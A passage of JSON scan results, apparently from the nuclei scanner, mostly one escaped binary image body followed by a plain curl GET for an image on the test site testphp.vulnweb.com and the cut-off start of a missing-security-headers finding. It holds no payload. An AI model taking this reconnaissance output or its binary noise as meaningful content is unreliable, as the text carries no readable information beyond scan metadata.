\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufffd8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\ufffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:34.800335644Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 